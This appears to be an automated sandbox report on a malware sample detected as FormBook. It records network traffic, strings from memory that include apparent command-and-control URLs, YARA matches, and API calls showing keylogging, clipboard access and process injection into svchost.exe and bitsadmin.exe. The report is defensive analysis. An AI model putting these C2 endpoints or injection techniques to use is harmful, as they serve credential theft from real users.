07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:28 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2F287T8cH1w00yYo3ZmhBPc30vknL7YQRDptOjLxPbAeS%2FkzqTzg7d32sZPQcYffsicCkkE%2Bu8h9SyTpFBRzvnMVuDGfcFf4X%2Fezl3V8FUmD6x2QCcDo4KwrZqEu%2F11Mo9XRDUUmpJo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f158ef042ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAzwjkMM9rm2er2wRcJjgkkLF7Kh2HMqNKClCBm7gmxZBG6R%2BBrezs0qbOvf%2BYZDVCDXgG%2FthxSbLOnP%2BKRF3oTE3%2BMAmtkgzp5Dt1EHCD%2BK0y3mvpsuFKdqsh21ikgQdmTGQ3Wquo4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f256cfac35e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: 1SxKeB4u0c.exe, 1SxKeB4u0c.exe, 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/:
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/rosecbcswnrlukq
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/rosecbcswnrlukq2524.400
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/rosecbcswnrlukqt
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/rosecbcswnrlukqp
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/L
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/U
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454333051.0000000000A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                Source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000007.00000002.3901034912.0000000006970000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3899231858.00000000049CC000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000007.00000002.3899231858.0000000004516000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.00000000033A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000007.00000003.1867178987.000000000842C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
                Source: 1SxKeB4u0c.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_820ac97e-f
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b802033f-c
                Source: 1SxKeB4u0c.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_abc5f272-f
                Source: 1SxKeB4u0c.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_77f9385a-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0044CA93 NtClose,3_2_0044CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2B60 NtClose,LdrInitializeThunk,3_2_02FD2B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02FD2DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD35C0 NtCreateMutant,LdrInitializeThunk,3_2_02FD35C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD4340 NtSetContextThread,3_2_02FD4340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD4650 NtSuspendThread,3_2_02FD4650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2AF0 NtWriteFile,3_2_02FD2AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2AD0 NtReadFile,3_2_02FD2AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2AB0 NtWaitForSingleObject,3_2_02FD2AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2BF0 NtAllocateVirtualMemory,3_2_02FD2BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2BE0 NtQueryValueKey,3_2_02FD2BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2BA0 NtEnumerateValueKey,3_2_02FD2BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2B80 NtQueryInformationFile,3_2_02FD2B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2EE0 NtQueueApcThread,3_2_02FD2EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2EA0 NtAdjustPrivilegesToken,3_2_02FD2EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2E80 NtReadVirtualMemory,3_2_02FD2E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2E30 NtWriteVirtualMemory,3_2_02FD2E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2FE0 NtCreateFile,3_2_02FD2FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2FB0 NtResumeThread,3_2_02FD2FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2FA0 NtQuerySection,3_2_02FD2FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2F90 NtProtectVirtualMemory,3_2_02FD2F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2F60 NtCreateProcessEx,3_2_02FD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2F30 NtCreateSection,3_2_02FD2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2CF0 NtOpenProcess,3_2_02FD2CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2CC0 NtQueryVirtualMemory,3_2_02FD2CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2CA0 NtQueryInformationToken,3_2_02FD2CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2C70 NtFreeVirtualMemory,3_2_02FD2C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2C60 NtCreateKey,3_2_02FD2C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2C00 NtQueryInformationProcess,3_2_02FD2C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2DD0 NtDelayExecution,3_2_02FD2DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2DB0 NtEnumerateKey,3_2_02FD2DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2D30 NtUnmapViewOfSection,3_2_02FD2D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2D10 NtMapViewOfSection,3_2_02FD2D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD2D00 NtSetInformationFile,3_2_02FD2D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD3090 NtSetValueKey,3_2_02FD3090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD3010 NtOpenDirectoryObject,3_2_02FD3010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD39B0 NtGetContextThread,3_2_02FD39B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD3D70 NtOpenThread,3_2_02FD3D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD3D10 NtOpenProcessToken,3_2_02FD3D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E4340 NtSetContextThread,LdrInitializeThunk,7_2_039E4340
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E4650 NtSuspendThread,LdrInitializeThunk,7_2_039E4650
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_039E2BA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_039E2BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_039E2BE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2B60 NtClose,LdrInitializeThunk,7_2_039E2B60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2AD0 NtReadFile,LdrInitializeThunk,7_2_039E2AD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2AF0 NtWriteFile,LdrInitializeThunk,7_2_039E2AF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2FB0 NtResumeThread,LdrInitializeThunk,7_2_039E2FB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2FE0 NtCreateFile,LdrInitializeThunk,7_2_039E2FE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2F30 NtCreateSection,LdrInitializeThunk,7_2_039E2F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_039E2E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_039E2EE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2DD0 NtDelayExecution,LdrInitializeThunk,7_2_039E2DD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_039E2DF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_039E2D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_039E2D30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_039E2CA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_039E2C70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2C60 NtCreateKey,LdrInitializeThunk,7_2_039E2C60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E35C0 NtCreateMutant,LdrInitializeThunk,7_2_039E35C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E39B0 NtGetContextThread,LdrInitializeThunk,7_2_039E39B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2B80 NtQueryInformationFile,7_2_039E2B80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2AB0 NtWaitForSingleObject,7_2_039E2AB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2F90 NtProtectVirtualMemory,7_2_039E2F90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2FA0 NtQuerySection,7_2_039E2FA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2F60 NtCreateProcessEx,7_2_039E2F60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2EA0 NtAdjustPrivilegesToken,7_2_039E2EA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2E30 NtWriteVirtualMemory,7_2_039E2E30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2DB0 NtEnumerateKey,7_2_039E2DB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2D00 NtSetInformationFile,7_2_039E2D00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2CC0 NtQueryVirtualMemory,7_2_039E2CC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2CF0 NtOpenProcess,7_2_039E2CF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E2C00 NtQueryInformationProcess,7_2_039E2C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E3090 NtSetValueKey,7_2_039E3090
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E3010 NtOpenDirectoryObject,7_2_039E3010
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E3D10 NtOpenProcessToken,7_2_039E3D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_039E3D70 NtOpenThread,7_2_039E3D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03289390 NtReadFile,7_2_03289390
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03289220 NtCreateFile,7_2_03289220
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03289690 NtAllocateVirtualMemory,7_2_03289690
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03289520 NtClose,7_2_03289520
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_03289480 NtDeleteFile,7_2_03289480
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0040E6A00_2_0040E6A0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0042D9750_2_0042D975
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0040FCE00_2_0040FCE0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004221C50_2_004221C5
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004362D20_2_004362D2
